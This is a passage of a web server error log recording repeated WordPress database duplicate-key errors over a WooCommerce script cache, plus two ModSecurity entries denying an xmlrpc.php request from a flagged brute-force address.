data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.542728 2026] [lsapi:warn] [pid 817651:tid 817787] [client 45.13.225.123:33182] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.544326 2026] [lsapi:warn] [pid 817651:tid 817787] [client 45.13.225.123:33182] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.563074 2026] [lsapi:warn] [pid 823496:tid 823734] [client 45.13.225.123:33150] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.564903 2026] [lsapi:warn] [pid 823496:tid 823734] [client 45.13.225.123:33150] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.567793 2026] [security2:error] [pid 823496:tid 823696] [client 117.198.37.168:50725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBmZa08mrtyBNpA4PbzwAAAEQ"]
[Tue May 26 16:48:49.567905 2026] [security2:error] [pid 823496:tid 823696] [client 117.198.37.168:50725] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBmZa08mrtyBNpA4PbzwAAAEQ"]
[Tue May 26 16:48:49.628050 2026] [lsapi:warn] [pid 817651:tid 817878] [client 45.13.225.123:33154] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.629459 2026] [lsapi:warn] [pid 817651:tid 817878] [client 45.13.225.123:33154] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"http